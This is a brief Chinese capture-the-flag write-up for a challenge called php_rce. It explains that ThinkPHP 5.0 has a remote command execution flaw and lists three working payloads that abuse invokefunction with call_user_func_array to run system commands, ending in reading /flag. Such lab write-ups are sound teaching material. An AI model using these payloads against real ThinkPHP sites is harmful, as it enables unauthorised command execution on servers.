php_rce
知识点
thinkphp5.0版本的框架存在远程命令执行漏洞
思路
进去页面,提示这是ThinkPhP v5的框架,百度一下看下有没有什么漏洞。发现有远程命令执行的漏洞。我们直接用百度的payload,进行远程命令执行
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
